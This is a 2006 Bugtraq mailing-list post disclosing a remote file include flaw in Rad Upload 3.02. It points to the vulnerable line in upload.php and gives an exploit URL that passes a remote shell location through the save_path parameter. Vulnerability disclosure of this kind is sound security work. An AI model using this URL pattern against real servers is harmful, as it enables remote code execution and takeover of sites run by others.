[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability
From: rko.thelegendkiller@xxxxxxxxx
Date: 12 Dec 2006 16:47:33 -0000

*^* Rad Upload Version 3.02 Remote File Include Vulnerability

*^* Source: http://www.radinks.com/downloads/raduploadlite.zip

*^* Vulnerable C0de On Line 39 In upload.php
    :
        if(isset($save_path) && $save_path!="")

*^* (EXploit) http://[victim]/[directory]/upload.php?save_path=[sh3ll]?

*^* Found3d By: Arham

*^* Gr33tz To -- Str0ke,Usman And Secure-Pak Team

Prev by Date: [SBDA] SiteKiosk - FileSystem Access
Next by Date: rPSA-2006-0230-1 evince
Previous by thread: [SBDA] SiteKiosk - FileSystem Access
Next by thread: rPSA-2006-0230-1 evince
Index(es):
- Date
- Thread